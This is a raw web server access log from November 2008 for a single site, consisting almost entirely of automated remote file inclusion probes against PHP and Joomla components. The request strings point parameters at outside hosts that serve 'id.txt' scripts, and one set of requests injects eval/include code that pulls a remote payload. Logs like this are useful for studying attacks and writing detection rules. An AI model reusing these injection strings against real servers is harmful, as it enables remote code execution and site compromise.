66.40.52.33 - - [19/Nov/2008:10:59:19 -0800] "GET /galeria.php?start=0&kategoria=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
66.40.52.33 - - [19/Nov/2008:10:59:19 -0800] "GET /logs/access_081002.log//galeria.php?start=0&kategoria=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
66.40.52.33 - - [19/Nov/2008:10:59:19 -0800] "GET /logs//galeria.php?start=0&kategoria=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
66.40.52.33 - - [19/Nov/2008:11:00:14 -0800] "GET /logs/access_081002.log%20%20//galeria.php?start=0&kategoria=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
66.249.73.133 - - [19/Nov/2008:11:06:42 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:11:06:48 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
66.40.52.33 - - [19/Nov/2008:11:26:47 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
66.40.52.33 - - [19/Nov/2008:11:26:47 -0800] "GET /logs/access_081004.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
66.40.52.33 - - [19/Nov/2008:11:26:47 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
66.40.52.33 - - [19/Nov/2008:11:27:13 -0800] "GET /logs/access_080924.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:11:27:55 -0800] "GET /logs/access_081004.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:11:27:55 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:11:27:56 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
83.222.23.200 - - [19/Nov/2008:11:31:08 -0800] "GET /logs/access_080924.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
213.207.110.102 - - [19/Nov/2008:11:46:57 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.irontonforge.com/McN/feel1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
213.207.110.102 - - [19/Nov/2008:11:46:57 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.irontonforge.com/McN/feel1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
213.207.110.102 - - [19/Nov/2008:11:46:57 -0800] "GET /logs/access_081002.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.irontonforge.com/McN/feel1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
88.80.202.189 - - [19/Nov/2008:11:48:38 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.agottahave.com"
88.80.202.189 - - [19/Nov/2008:11:48:39 -0800] "GET /logs/access_081002.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.agottahave.com"
88.80.202.189 - - [19/Nov/2008:11:48:39 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.agottahave.com"
121.126.12.7 - - [19/Nov/2008:12:14:42 -0800] "GET /logs/access_080926.log/errors.php?error=http://www.enjoykankoku.jp/parti/idih.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.agottahave.com"
121.126.12.7 - - [19/Nov/2008:12:14:42 -0800] "GET /errors.php?error=http://www.enjoykankoku.jp/parti/idih.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.agottahave.com"
121.126.12.7 - - [19/Nov/2008:12:14:42 -0800] "GET /logs/errors.php?error=http://www.enjoykankoku.jp/parti/idih.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.agottahave.com"
218.239.45.184 - - [19/Nov/2008:12:19:21 -0800] "GET /logs/errors.php?error=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.agottahave.com"
218.239.45.184 - - [19/Nov/2008:12:19:21 -0800] "GET /logs/access_080926.log/errors.php?error=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.agottahave.com"
218.239.45.184 - - [19/Nov/2008:12:19:21 -0800] "GET /errors.php?error=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.agottahave.com"
195.96.238.2 - - [19/Nov/2008:12:27:17 -0800] "GET /administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
80.247.64.150 - - [19/Nov/2008:12:28:28 -0800] "GET /administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
70.38.31.50 - - [19/Nov/2008:12:47:45 -0800] "GET /administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:51:12 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:51:12 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:51:12 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:51:20 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:51:20 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:51:20 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:51:21 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:51:21 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:51:21 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:52:04 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:52:04 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:52:04 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:52:28 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:52:28 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:52:28 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:52:43 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:52:43 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:52:43 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:11 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:11 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:11 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:12 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:12 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:12 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:26 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:26 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:26 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:26 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:26 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:26 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:34 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:34 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:34 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:37 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:37 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:37 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:38 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:38 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
94.23.10.29 - - [19/Nov/2008:12:53:38 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
195.96.238.2 - - [19/Nov/2008:12:54:06 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
80.247.64.150 - - [19/Nov/2008:12:55:40 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
67.40.148.193 - - [19/Nov/2008:12:57:41 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
67.40.148.193 - - [19/Nov/2008:12:57:41 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
67.40.148.193 - - [19/Nov/2008:12:57:41 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
67.40.148.193 - - [19/Nov/2008:12:57:41 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
67.40.148.193 - - [19/Nov/2008:12:57:41 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
67.40.148.193 - - [19/Nov/2008:12:57:41 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
67.40.148.193 - - [19/Nov/2008:12:57:41 -0800] "GET /logs/access_081002.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
67.40.148.193 - - [19/Nov/2008:12:57:42 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
67.40.148.193 - - [19/Nov/2008:12:57:42 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ragas.baarleweb.net/data/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.agottahave.com"
80.66.192.102 - - [19/Nov/2008:13:01:04 -0800] "GET /administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.agottahave.com"
66.249.73.133 - - [19/Nov/2008:13:05:02 -0800] "GET /logs/access_081119.log HTTP/1.1" 200 205082 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.agottahave.com"
70.38.31.50 - - [19/Nov/2008:13:08:41 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
72.52.170.160 - - [19/Nov/2008:13:10:22 -0800] "GET /logs/access_080911.log//index2.php?url_page=http://vnc2009.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.agottahave.com"
72.52.170.160 - - [19/Nov/2008:13:10:23 -0800] "GET /logs//index2.php?url_page=http://vnc2009.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.agottahave.com"
72.52.170.160 - - [19/Nov/2008:13:10:23 -0800] "GET /index2.php?url_page=http://vnc2009.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.agottahave.com"
80.247.64.150 - - [19/Nov/2008:13:11:24 -0800] "GET /logs/access_080926.log//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
80.247.64.150 - - [19/Nov/2008:13:11:24 -0800] "GET /administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
80.247.64.150 - - [19/Nov/2008:13:11:25 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
72.52.170.160 - - [19/Nov/2008:13:12:00 -0800] "GET /logs/access_080924.log//index2.php?url_page=http://vnc2009.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.agottahave.com"
80.247.64.150 - - [19/Nov/2008:13:15:33 -0800] "GET /logs/access_080925.log//administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
74.7.219.93 - - [19/Nov/2008:13:15:37 -0800] "GET /logs/access_080926.log/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
74.7.219.93 - - [19/Nov/2008:13:15:37 -0800] "GET /errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
74.7.219.93 - - [19/Nov/2008:13:15:38 -0800] "GET /logs/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
212.227.119.13 - - [19/Nov/2008:13:17:47 -0800] "GET /logs/access_080924.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
212.227.119.13 - - [19/Nov/2008:13:17:48 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
212.227.119.13 - - [19/Nov/2008:13:17:48 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
80.247.64.150 - - [19/Nov/2008:13:21:03 -0800] "GET /logs/access_080926.log//modules/TotalCalendar/about.php?inc_dir=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
80.247.64.150 - - [19/Nov/2008:13:21:03 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
80.247.64.150 - - [19/Nov/2008:13:21:04 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.agottahave.com"
195.96.238.2 - - [19/Nov/2008:13:21:21 -0800] "GET /logs/access_080926.log//modules/TotalCalendar/about.php?inc_dir=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
195.96.238.2 - - [19/Nov/2008:13:21:21 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
195.96.238.2 - - [19/Nov/2008:13:21:22 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.manaskateboards.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
